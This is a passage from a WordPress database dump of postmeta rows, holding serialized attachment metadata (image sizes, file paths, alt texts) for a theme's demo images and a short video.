\"length\";i:6;s:16:\"length_formatted\";s:4:\"0:06\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:48000;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:-2082844800;}'),(51825,2773,'_wp_attachment_image_alt','m'),(51826,2665,'_wp_attachment_image_alt','x'),(51827,2353,'_wp_attachment_image_alt','m'),(51828,2754,'_wp_attached_file','2018/09/landing-print-img-4.jpg'),(51829,2754,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:734;s:6:\"height\";i:878;s:4:\"file\";s:31:\"2018/09/landing-print-img-4.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-251x300.jpg\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-734x650.jpg\";s:5:\"width\";i:734;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-650x878.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:878;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-print-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51830,2803,'_wp_attached_file','2018/09/icon_final_512x512.png'),(51831,2803,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:30:\"2018/09/icon_final_512x512.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"icon_final_512x512-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"icon_final_512x512-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"icon_final_512x512-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"icon_final_512x512-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"icon_final_512x512-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"icon_final_512x512-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51832,2774,'_wp_attached_file','2018/09/landing-img-13.jpg'),(51833,2774,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-13.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-13-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-13-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-13-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-13-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-13-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-13-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-13-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-13-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51834,2200,'_wp_attached_file','2018/08/h5-img-14a.jpg'),(51835,2200,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:376;s:6:\"height\";i:510;s:4:\"file\";s:22:\"2018/08/h5-img-14a.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"h5-img-14a-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-14a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"h5-img-14a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-14a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"h5-img-14a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-14a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51836,2695,'_wp_attached_file','2018/09/landing-scrool.jpg'),(51837,2695,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1;s:6:\"height\";i:53;s:4:\"file\";s:26:\"2018/09/landing-scrool.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51838,2695,'_wp_attachment_image_alt','c'),(51839,2803,'_wp_attachment_image_alt','m'),(51840,2487,'_wp_attached_file','2018/08/h3-team-member-img-1.jpg'),(51841,2487,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:32:\"2018/08/h3-team-member-img-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h3-team-member-img-1-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-1-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51842,2200,'_wp_attachment_image_alt','m'),(51843,2754,'_wp_attachment_image_alt','c'),(51844,2487,'_wp_attachment_image_alt','m'),(51845,2774,'_wp_attachment_image_alt','m'),(51846,2804,'_wp_attached_file','2018/09/cropped-icon_final_512x512.png'),(51847,2804,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:38:\"2018/09/cropped-icon_final_512x512.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cropped-icon_final_512x512-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"cropped-icon_final_512x512-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"cropped-icon_final_512x512-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"cropped-icon_final_512x512-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:38:\"cropped-icon_final_512x512-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"cropped-icon_final_512x512-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51848,2202,'_wp_attached_file','2018/08/h7-port-img-8.jpg'),(51849,2202,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:25:\"2018/08/h7-port-img-8.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h7-port-img-8-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"h7-port-img-8-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h7-port-img-8-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h7-port-img-8-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:27:\"h7-port-img-8-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h7-port-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51850,2755,'_wp_attached_file','2018/09/landing-vector-img-7.jpg'),(51851,2755,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:533;s:6:\"height\";i:347;s:4:\"file\";s:32:\"2018/09/landing-vector-img-7.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-7-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-7-300x347.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-7-300x347.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51852,2804,'_wp_attachment_context','site-icon'),(51853,2488,'_wp_attached_file','2018/08/h3-team-member-img-2.jpg'),(51854,2488,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:32:\"2018/08/h3-team-member-img-2.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h3-team-member-img-2-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-2-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-team-member-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51855,2755,'_wp_attachment_image_alt','c'),(51856,2712,'_wp_attached_file','2018/09/landing-vector-img-1.png'),(51857,2712,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:378;s:6:\"height\";i:277;s:4:\"file\";s:32:\"2018/09/landing-vector-img-1.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-1-300x220.png\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-1-300x277.png\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-1-300x277.png\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51858,2775,'_wp_attached_file','2018/09/landing-img-14.jpg'),(51859,2488,'_wp_attachment_image_alt','m'),(51860,2775,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-14.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-14-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-14-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-14-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-14-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-14-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-14-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-14-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-14-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}